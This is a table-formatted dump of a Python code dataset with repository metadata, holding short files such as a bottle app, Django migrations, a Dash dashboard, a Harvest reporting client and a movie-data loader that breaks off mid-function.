hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3aeaaea0220995b51a401a8289992641fdab006b | 238 | py | Python | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | import bottle
root = __import__("pathlib").Path(__file__).resolve().parent
bottle.TEMPLATE_PATH = [str(root / "views")]
app = bottle.default_app()
host = "127.0.0.1"
port = "65534"
from . import controller
from . import download_video
| 19.833333 | 60 | 0.722689 |
3aeb5f1a3b042dd49ac3276109266415fd562f10 | 2,045 | py | Python | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | import logging
import numpy as np
__all__ = [
'generate_random_points_inside_balls',
'generate_random_point_inside_balls',
'generate_random_points_inside_ball',
'generate_random_point_inside_ball',
]
# %%
def generate_random_points_inside_balls(
X,
normalizer,
mode,
phi,
n=1,
model=None,
different_prediction=False,
):
if different_prediction and model is None:
raise ValueError('You must pass the model in order to filter points.')
if not different_prediction and model is not None:
logging.warning('Model passed to `generate_random_points_inside_balls` but `different_prediction = False`.')
# Ball diameter
diameter = normalizer.feature_deviation(method=mode, phi=phi)
nb_features = X.shape[1]
def __shift(x, n, p=None):
if n == 0:
return np.array([]).reshape(0, nb_features)
# Sample
Epsilon = np.random.rand(n, nb_features) - .5
X_prime = normalizer.shift(
np.tile(x, (n, 1)),
shifts=np.tile(diameter, (n, 1)) * Epsilon,
method=mode,
)
if p is not None:
X_prime_ = X_prime[model.predict(X_prime) == p]
# Recursively call the function if not enough samples are generated
return np.concatenate([X_prime_, __shift(x, n=n - len(X_prime_), p=p)], axis=0)
else:
return X_prime
if different_prediction:
preds = model.predict(X)
return np.array([__shift(x, n, p) for x, p in zip(X, preds)])
else:
return np.array([__shift(x, n) for x in X])
def generate_random_point_inside_balls(X, *args, **kwargs):
return generate_random_points_inside_balls(X, *args, n=1, **kwargs)[:, 0, :]
def generate_random_points_inside_ball(x, *args, **kwargs):
return generate_random_points_inside_balls(np.array([x]), *args, **kwargs)[0]
def generate_random_point_inside_ball(x, *args, **kwargs):
return generate_random_points_inside_ball(x, *args, n=1, **kwargs)[0]
# %%
| 28.402778 | 116 | 0.6489 |
3aec38a277d65b28e5bc3af20165517902bdb701 | 1,189 | py | Python | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
def getpts(path):
pts = set()
loc = [0, 0]
for step in path:
direction = step[0]
distance = int(step[1:])
if direction == "R":
for s in range(distance):
pts.add((loc[0] + s + 1, loc[1]))
loc[0] += distance
elif direction == "L":
for s in range(distance):
pts.add((loc[0] - s - 1, loc[1]))
loc[0] -= distance
elif direction == "U":
for s in range(distance):
pts.add((loc[0], loc[1] - s - 1))
loc[1] -= distance
elif direction == "D":
for s in range(distance):
pts.add((loc[0], loc[1] + s + 1))
loc[1] += distance
return pts
with open("input.txt") as f:
directions = f.read()
path1, path2 = map(lambda x: x.split(","), directions.strip().split("\n"))
pts1 = getpts(path1)
pts2 = getpts(path2)
intersections = pts1.intersection(pts2)
min_dist = None
closest = None
for i in intersections:
dist = abs(i[0]) + abs(i[1])
if min_dist is None or dist < min_dist:
closest = i
min_dist = dist
print(min_dist)
| 23.78 | 78 | 0.502103 |
3aece6336549f29b4f897302ef630eedb4bbc785 | 609 | py | Python | tests/plugins/test_openrectv.py | hymer-up/streamlink | f09bf6e04cddc78eceb9ded655f716ef3ee4b84f | [
"BSD-2-Clause"
] | 5 | 2017-03-21T19:43:17.000Z | 2018-10-03T14:04:29.000Z | tests/plugins/test_openrectv.py | hymer-up/streamlink | f09bf6e04cddc78eceb9ded655f716ef3ee4b84f | [
"BSD-2-Clause"
] | 7 | 2016-10-13T23:29:31.000Z | 2018-06-28T14:04:32.000Z | tests/plugins/test_openrectv.py | bumplzz69/streamlink | 34abc43875d7663ebafa241573dece272e93d88b | [
"BSD-2-Clause"
] | 2 | 2016-11-24T18:37:33.000Z | 2017-03-21T19:43:49.000Z | import unittest
from streamlink.plugins.openrectv import OPENRECtv
class TestPluginOPENRECtv(unittest.TestCase):
def test_can_handle_url(self):
should_match = [
'https://www.openrec.tv/live/DXRLAPSGTpx',
'https://www.openrec.tv/movie/JsDw3rAV2Rj',
]
for url in should_match:
self.assertTrue(OPENRECtv.can_handle_url(url))
def test_can_handle_url_negative(self):
should_not_match = [
'https://www.openrec.tv/',
]
for url in should_not_match:
self.assertFalse(OPENRECtv.can_handle_url(url))
| 29 | 59 | 0.648604 |
3aedb392cb14830050e8adbbfe3be5d562d42189 | 2,264 | py | Python | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2021-05-07 18:57
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Lobby',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateField(auto_now_add=True, null=True)),
('is_active_playback', models.BooleanField(default=False)),
('is_active', models.BooleanField(blank=True, default=True, null=True)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lobbyuser1', to=settings.AUTH_USER_MODEL)),
('users_connected', models.ManyToManyField(blank=True, related_name='users_conntected', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='current_song',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_uri', models.CharField(blank=True, max_length=100, null=True)),
('date_created', models.DateField(auto_now_add=True, null=True)),
('lobby', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lobby', to='spotify.lobby')),
],
),
migrations.CreateModel(
name='Access_token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('access_token', models.CharField(blank=True, max_length=500, null=True)),
('refresh_token', models.CharField(blank=True, max_length=500, null=True)),
('expiers_at', models.CharField(blank=True, max_length=100, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='token_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| 47.166667 | 146 | 0.628534 |
3aedf299041cb35f549d54f7d93a4515346863a2 | 6,474 | py | Python | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | 1 | 2021-06-25T08:53:31.000Z | 2021-06-25T08:53:31.000Z | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | null | null | null | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | null | null | null | # Script de criação do dashboard
# https://dash.plotly.com/dash-html-components
# Imports
import traceback
import pandas as pd
import plotly.express as px
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output
# Módulos customizados
from app import app
from modulos import data_operations, constant
# Gera o layout
def get_layout():
try:
# Gera o container
layout = dbc.Container([
dbc.Row([
dbc.Col([
dbc.Card([dbc.CardHeader("Ano"),
dbc.CardBody([html.H5(data_operations.Ano2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Seguros Previstos"),
dbc.CardBody([html.H5(data_operations.TotalNewPolicies2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Maquinas Previstas"),
dbc.CardBody([html.H5(data_operations.MachinesInstalled2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Lucro Medio"),
dbc.CardBody([html.H5(data_operations.LucroMedio2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3)],
className= "pb-3"),
dbc.Row([
dbc.Col([
dbc.Card([dbc.CardHeader("Ano"),
dbc.CardBody([html.H5(data_operations.Ano2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Seguros Previstos"),
dbc.CardBody([html.H5(data_operations.TotalNewPolicies2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Maquinas Previstas"),
dbc.CardBody([html.H5(data_operations.MachinesInstalled2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
dbc.Col([
dbc.Card([dbc.CardHeader("Lucro Medio"),
dbc.CardBody([html.H5(data_operations.LucroMedio2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3)],
className= "pb-3"),
dbc.Row([
dbc.Card([dbc.CardBody([html.H6("Na página visão geral temos o total de seguros vendidos, maquinas instaladas e lucro médio ao longo dos anos 2009 a 2015 nos cardes. No gráfico das contratações de seguros, percebe-se uma tendência, crescente de novas aquisições até o ano de 2013, depois uma leve queda entre os anos 2015 e 2016, porem algo interessante a se notar é que em todos os anos os picos de contratações ocorrem em março, seria interessante a empresa investigar o porquê. Em relação a instalação de máquinas seguem também um padrão quase constante, onde podemos notar picos de instalações maiores nos meses de dezembro. Embora nos últimos anos (2014,2015) a empresa tenho tido menos contratações, assim como instalações de máquinas, o seu lucro médio anual não caiu, aumenta a cada ano, isso mostra uma eficiência da empresa em manter clientes antigos.", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
className= "pb-3"),
dbc.Row([
dbc.Card([dbc.CardBody([html.H6("Na página previsões, temos o primeiro gráfico mostrando as previsões (tendências) para aquisição de novas apólices, podemos ver as previsões do modelo para todos os anos, e os pontos pretos sendo os dados atuais, pode-se notar que o modelo fez um bom trabalho, levando em consideração que as previsões estão dentro da margem de erro que é a parte sombreada, já o segundo gráfico mostra apenas os valores para os anos a serem previstos. O mesmo ocorre nos gráficos 3 e 4, esses já com relação a instalações de novas maquinas. Com essas previsões os gestores podem se preparar para os próximos dois anos se baseando no que o modelo previu como tendência. ", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
className= "pb-3"),
dbc.Row([
dbc.Card([dbc.CardBody([html.H6("Nessa página de insights, é mostrado resumidamente o total, de novas contratações e novas instalações de maquinas assim como o lucro médio dos anos previstos, todas as essas previsões com visto na página previsões seguem um padrão, identificado pelo modelo com relação aos anos anteriores, embora a previsão para novas contratações para 2017 não esteja tão alto, o lucro médio não caiu tanto, o modelo levou em consideração a tendência que vem ocorrendo em que a empresa tem uma boa qualidade de serviço fazendo com que os clientes antigos permaneçam com os serviços a cada ano. Todas as informações acima e os gráficos são valiosas, pois os gestores conseguem agora identificar padrões e possivelmente algumas falhas, e com isso entender o que pode vir a ocorrer, se manter o trabalho que vem feito, e até buscar melhorias para que atinja valores acima do previsto.", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
className= "pb-3")
],
fluid = True)
return layout
except:
layout = dbc.Jumbotron(
[
html.Div([
html.H1("500: Internal Server Error", className = "text-danger"),
html.Hr(),
html.P(f"Following Exception Occured: "),
html.Code(traceback.format_exc())
],
style = constant.NAVITEM_STYLE)
]
)
return layout
| 78.95122 | 998 | 0.605653 |
3aef6a1d97b22b7334946b3961dc63d93d47db28 | 752 | py | Python | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | null | null | null | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | 6 | 2021-09-30T11:31:58.000Z | 2022-03-21T15:12:28.000Z | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | 1 | 2022-03-27T16:53:05.000Z | 2022-03-27T16:53:05.000Z | from rest_framework import serializers
from core.models import Prompt, CustomUser
class CustomUserSerializer(serializers.ModelSerializer):
class Meta:
model = CustomUser
fields = ["id", "username"]
class PromptSerializer(serializers.HyperlinkedModelSerializer):
created_by = CustomUserSerializer(required=False)
class Meta:
model = Prompt
fields = ["id", "created_at", "status", "schema", "url", "created_by", "response"]
read_only_fields = ['id', 'created_at', 'created_by', 'modified_at', 'status', 'url']
class PromptResponseSerializer(serializers.ModelSerializer):
class Meta:
model = Prompt
fields = ["response"]
extra_kwargs = {'response': {'required': True}}
| 31.333333 | 93 | 0.682181 |
3aef79b3128b41665021c29aae4c84fa02130963 | 246 | py | Python | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | 2 | 2020-05-23T11:21:31.000Z | 2020-06-03T22:52:09.000Z | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | null | null | null | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | 1 | 2020-05-17T15:19:13.000Z | 2020-05-17T15:19:13.000Z | c.Session.debug = True
c.LabApp.token = 'test'
c.LabApp.open_browser = False
c.NotebookApp.port_retries = 0
c.LabApp.workspaces_dir = './build/cypress-tests'
c.FileContentsManager.root_dir = './build/cypress-tests'
c.LabApp.quit_button = False
| 30.75 | 56 | 0.764228 |
3af126e2b1c1da6fe4b8a9b65f8ca9e789c79dde | 191 | py | Python | apps/access/admin.py | usdigitalresponse/rtovid-encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | 1 | 2021-06-22T10:11:10.000Z | 2021-06-22T10:11:10.000Z | apps/access/admin.py | usdigitalresponse/rtovid-encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | 23 | 2020-05-28T01:00:01.000Z | 2020-06-23T12:49:55.000Z | apps/access/admin.py | RTCovid/encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | null | null | null | from django.contrib.gis import admin
from apps.access.models import InvitedEmail
class InvitedEmailAdmin(admin.ModelAdmin):
pass
admin.site.register(InvitedEmail, InvitedEmailAdmin)
| 17.363636 | 52 | 0.816754 |
3af3501863237636c8ad601e7b05518a6b063f13 | 1,550 | py | Python | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 14:10
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('ciudadano', '0052_auto_20170920_1003'),
]
operations = [
migrations.CreateModel(
name='AntecedenteReaccionAdversaMedicamento',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha_creacion', models.DateTimeField(auto_now_add=True, null=True)),
('fecha_modificacion', models.DateTimeField(auto_now=True, null=True)),
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
('es_removido', models.BooleanField(default=False, editable=False)),
('familia_medicamento', models.CharField(max_length=10)),
('medicamento', models.CharField(max_length=10)),
('anio_diagnostico', models.CharField(blank=True, max_length=4, null=True)),
('observaciones', models.TextField(blank=True, null=True)),
('registro_antecedente', models.CharField(choices=[('0', 'No'), ('1', 'Sí'), ('2', 'No sabe')], default='1', max_length=1)),
('consulta_paciente', models.UUIDField()),
('ciudadano', models.UUIDField()),
],
options={
'abstract': False,
},
),
]
| 41.891892 | 140 | 0.593548 |
3af4df280e903825cd489383b9d45d6281eb6687 | 491 | py | Python | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null |
def test_example(app):
app.login_admin()
app.get("http://localhost/litecart/admin/?app=catalog&doc=catalog&category_id=1")
menu=app.driver.find_elements_by_css_selector("tr .row")
for n in range(0,len(menu)):
element = app.driver.find_elements_by_css_selector("tr .row")
element[n].click()
for l in app.driver.get_log("browser"):
print(l)
app.driver.get("http://localhost/litecart/admin/?app=catalog&doc=catalog&category_id=1") | 35.071429 | 96 | 0.672098 |
3af623d8cb194fe7d9a3384310c51e0b984f4828 | 302 | py | Python | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | null | null | null | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | 1 | 2022-03-30T14:11:13.000Z | 2022-03-30T14:11:37.000Z | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | null | null | null | from pyautogui import *
import pyautogui
import time
while 1:
if pyautogui.locateOnScreen('img.png', region=(150,175,350,600), grayscale=True, confidence=0.8) != None:
print("I can see it")
time.sleep(0.5)
else:
print("I am unable to see it")
time.sleep(0.5)
| 25.166667 | 109 | 0.625828 |
3af692d7975c4dc7bec14dbb6e213b560c3130d8 | 7,526 | py | Python | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | null | null | null | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | null | null | null | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | 1 | 2022-03-28T10:47:37.000Z | 2022-03-28T10:47:37.000Z |
# Copyright 2020 Bradbase
import itertools
from datetime import datetime, timedelta, date
from calendar import monthrange
from harvest import Harvest
from .harvestdataclasses import *
class DetailedReports(Harvest):
def __init__(self, uri, auth):
super().__init__(uri, auth)
self.client_cache = {}
self.project_cache = {}
self.task_cache = {}
self.user_cache = {}
def timeframe(self, timeframe, from_date=None, to_date=None):
quarters = [None,
[1, 3], [1, 3], [1, 3],
[4, 6], [4, 6], [4, 6],
[7, 9], [7, 9], [7, 9],
[10, 12], [10, 12], [10, 12]]
today = datetime.now().date()
timeframe_upper = timeframe.upper()
if timeframe_upper == 'THIS WEEK':
start_date = today - timedelta(days=today.weekday())
end_date = start_date + timedelta(days=6)
elif timeframe_upper == 'LAST WEEK':
today = today - timedelta(days=7)
start_date = today - timedelta(days=today.weekday())
end_date = start_date + timedelta(days=6)
elif timeframe_upper == 'THIS SEMIMONTH':
if today.day <= 15:
start_date = today.replace(day=1)
end_date = today.replace(day=15)
else:
start_date = today.replace(day=16)
end_date = today.replace(
day=monthrange(today.year, today.month)[1])
elif timeframe_upper == 'LAST SEMIMONTH':
if today.day <= 15:
if today.month == 1:
start_date = today.replace(
year=today.year-1, month=12, day=16)
end_date = today.replace(
year=today.year-1,
month=12,
day=monthrange(today.year-1, 12)[1])
else:
start_date = today.replace(month=today.month-1, day=16)
end_date = today.replace(
month=today.month-1,
day=monthrange(today.year, today.month-1)[1])
else:
start_date = today.replace(day=1)
end_date = today.replace(day=15)
elif timeframe_upper == 'THIS MONTH':
start_date = today.replace(day=1)
end_date = today.replace(
day=monthrange(today.year, today.month)[1])
elif timeframe_upper == 'LAST MONTH':
if today.month == 1:
start_date = today.replace(year=today.year-1, month=12, day=1)
end_date = today.replace(
year=today.year-1,
month=12,
day=monthrange(today.year-1, 12)[1])
else:
start_date = today.replace(month=today.month-1, day=1)
end_date = today.replace(
month=today.month-1,
day=monthrange(today.year, today.month-1)[1])
elif timeframe_upper == 'THIS QUARTER':
quarter = quarters[today.month]
start_date = date(today.year, quarter[0], 1)
end_date = date(
today.year,
quarter[1],
monthrange(today.year, quarter[1])[1])
elif timeframe_upper == 'LAST QUARTER':
if today.month <= 3:
quarter = [10, 12]
today = today.replace(year=today.year-1)
else:
quarter = quarters[today.month-3]
start_date = date(today.year, quarter[0], 1)
end_date = date(
today.year,
quarter[1],
monthrange(today.year, quarter[1])[1])
elif timeframe_upper == 'THIS YEAR':
start_date = date(today.year, 1, 1)
end_date = date(today.year, 12, 31)
elif timeframe_upper == 'LAST YEAR':
start_date = date(today.year-1, 1, 1)
end_date = date(today.year-1, 12, 31)
elif timeframe_upper == 'ALL TIME':
return {}
# Not currently supported
elif timeframe_upper == 'CUSTOM':
raise ValueError("Custom timeframe not currently supported.")
else:
raise ValueError(
"unknown argument \'timeframe\': \'%s\'" % timeframe_upper)
return {'from_date': start_date, 'to_date': end_date}
# team is user
def detailed_time(self, time_frame='All Time', clients=[None], projects=[None], tasks=[None], team=[None], include_archived_items=False, group_by='Date', activeProject_only=False):
arg_configs = []
time_entry_results = DetailedTimeReport([])
for element in itertools.product(clients, projects, team):
kwargs = {}
if element[0] !=None:
kwargs['client_id'] = element[0]
if element[1] !=None:
kwargs['project_id'] = element[1]
if element[2] !=None:
kwargs['user_id'] = element[2]
kwargs = dict(self.timeframe(time_frame), **kwargs)
arg_configs.append(kwargs)
tmp_time_entry_results = []
if arg_configs == []:
time_entries = self.time_entries()
tmp_time_entry_results.extend(time_entries.time_entries)
if time_entries.total_pages > 1:
for page in range(2, time_entries.total_pages + 1):
time_entries = self.time_entries(page=page)
tmp_time_entry_results.extend(time_entries.time_entries)
else:
for config in arg_configs:
time_entries = self.time_entries(**kwargs)
tmp_time_entry_results.extend(time_entries.time_entries)
if time_entries.total_pages > 1:
for page in range(2, time_entries.total_pages + 1):
time_entries = self.time_entries(page=page, **kwargs)
tmp_time_entry_results.extend(time_entries.time_entries)
for time_entry in tmp_time_entry_results:
user = None
if time_entry.user.id not in self.user_cache.keys():
user = self.get_user(time_entry.user.id)
self.user_cache[time_entry.user.id] = user
else:
user = self.user_cache[time_entry.user.id]
hours = time_entry.hours
billable_amount = 0.0
cost_amount = 0.0
billable_rate = time_entry.billable_rate
cost_rate = time_entry.cost_rate
if hours is not None:
if billable_rate is not None:
billable_amount = billable_rate * hours
if cost_rate is not None:
cost_amount = cost_rate * hours
time_entry_results.detailed_time_entries.append( DetailedTimeEntry(date=time_entry.spent_date, client=time_entry.client.name, project=time_entry.project.name, project_code=time_entry.project.code, task=time_entry.task.name, notes=time_entry.notes, hours=hours, billable=str(time_entry.billable), invoiced='', approved='', first_name=user.first_name, last_name=user.last_name, roles=user.roles, employee='Yes', billable_rate=billable_rate, billable_amount=billable_amount, cost_rate=cost_rate, cost_amount=cost_amount, currency=time_entry.client.currency, external_reference_url=time_entry.external_reference) )
return time_entry_results
| 40.245989 | 622 | 0.558464 |
3af6f1205b131d37a985d1c51f9e6d5d18cb4383 | 328 | py | Python | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 253 | 2015-01-03T23:17:57.000Z | 2021-12-14T02:31:08.000Z | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 879 | 2015-01-11T16:07:25.000Z | 2021-12-10T16:24:31.000Z | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 71 | 2015-01-04T01:02:47.000Z | 2022-03-25T18:30:10.000Z | """
Send a kill signal to a BiblioPixel process running on this
machine to abruptly kill it
DEPRECATED: use
.. code-block:: bash
$ kill -kill `bpa-pid`
"""
DESCRIPTION = """
Example:
.. code-block:: bash
$ bp kill
"""
from .. util.signal_handler import make_command
add_arguments, run = make_command('SIGKILL')
| 13.666667 | 59 | 0.682927 |
3af703dc54a66f683dbd47d8d1a850161cd49620 | 5,645 | py | Python | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | # Standard imports
import json
import ast
# Third party imports
import pandas as pd
from tabulate import tabulate
# Local application imports
from utils.logger import logger
class Dataloding:
"""Loads movie lens and TMDB data from data folder.
"""
def __init__(self, data_folder='data'):
self.data_folder = data_folder.strip('/')
self.load_data()
def load_data(self) -> None:
ratings_file_path = self.data_folder + '/ratings.csv'
self.ratings_df = pd.read_csv(ratings_file_path)
logger.info("ratings: ")
logger.info(tabulate(self.ratings_df.head(), headers='keys',
tablefmt='pretty'))
logger.info("successfully loaded ratings. entries: %s" % \
self.ratings_df.shape[0])
movies_data_path = self.data_folder + '/movies_metadata.csv'
self.movies_df = pd.read_csv(movies_data_path)
self.movies_df = self.transform_movies_df(self.movies_df)
logger.info("successfully loaded movies metadata. entries: %s" % \
self.movies_df.shape[0])
keywords_data_path = self.data_folder + '/keywords.csv'
self.keywords_df = pd.read_csv(keywords_data_path)
self.keywords_df = self.transform_keywords_df(self.keywords_df)
logger.info("successfully loaded movie keywords data. entries: %s" \
% self.keywords_df.shape[0])
links_data_path = self.data_folder + '/links.csv'
self.links_df = pd.read_csv(links_data_path)
logger.info("movie links: ")
logger.info(tabulate(self.links_df.head(), headers='keys',
tablefmt='pretty'))
logger.info("successfully loaded movie links data. entries: %s" \
% self.links_df.shape[0])
credits_data_path = self.data_folder + '/credits.csv'
self.credits_df = pd.read_csv(credits_data_path)
self.credits_df = self.transform_credits_df(self.credits_df)
logger.info("successfully loaded credits data. entries: %s" \
% self.credits_df.shape[0])
logger.info("successfully loaded all data")
def transform_movies_df(self, movies_df) -> pd.DataFrame:
"""Converts non strings like jsons or other data types to string or list.
and also minimizes data size.
Args:
movies (DataFrame): movies data in df format
Returns:
DataFrame: dataframe with better data structures.
"""
self.id_collection = {}
self.id_genre = {}
for index, row in movies_df.iterrows():
if not pd.isna(row['belongs_to_collection']) and \
row['belongs_to_collection'].strip():
collection_str = row['belongs_to_collection']
collection_json = ast.literal_eval(collection_str)
movies_df.loc[index, 'belongs_to_collection'] = \
collection_json['id']
self.id_collection[collection_json['id']] = \
collection_json['name']
else:
movies_df.loc[index, 'belongs_to_collection'] = -1
if not pd.isna(row['genres']) and \
row['genres'].strip():
genres_str = row['genres']
genres_list = ast.literal_eval(genres_str)
movies_df.at[index, 'genres'] = [g['id'] for g in genres_list]
for genre in genres_list:
